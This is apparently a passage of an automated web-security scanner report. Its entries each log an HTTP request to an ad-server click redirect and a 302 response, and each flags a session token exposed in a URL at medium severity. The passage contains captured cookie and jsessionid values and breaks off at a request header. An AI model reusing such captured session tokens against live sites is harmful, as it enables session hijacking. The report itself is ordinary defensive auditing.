GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:22:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:01:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

